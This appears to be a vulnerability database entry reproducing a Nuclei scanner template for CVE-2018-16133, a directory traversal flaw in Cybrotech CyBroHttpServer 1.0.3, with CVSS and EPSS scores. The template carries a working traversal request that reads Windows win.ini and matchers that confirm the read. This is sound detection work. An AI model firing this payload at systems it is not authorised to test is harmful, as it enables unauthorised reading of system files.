Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16133
HistoryDec 01, 2021 - 2:26 a.m.

Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion

2021-12-0102:26:56
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.036 Low

EPSS

Percentile

91.7%

Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.

id: CVE-2018-16133

info:
  name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
  reference:
    - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
    - http://www.cybrotech.com/
    - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16133
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-16133
    cwe-id: CWE-22
    epss-score: 0.03629
    epss-percentile: 0.91461
    cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cybrotech
    product: cybrohttpserver
  tags: cve2018,cve,lfi,packetstorm,cybrotech

http:
  - raw:
      - |+
        GET \..\..\..\..\Windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100bec0bd28d03a8668e238050338b250954c84ef14d63693d29d23164a96eb7940022100e7a8f25d4206e7b85164c393af308c6186954abe8b02b180e84a80b946227f50:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.036 Low

EPSS

Percentile

91.7%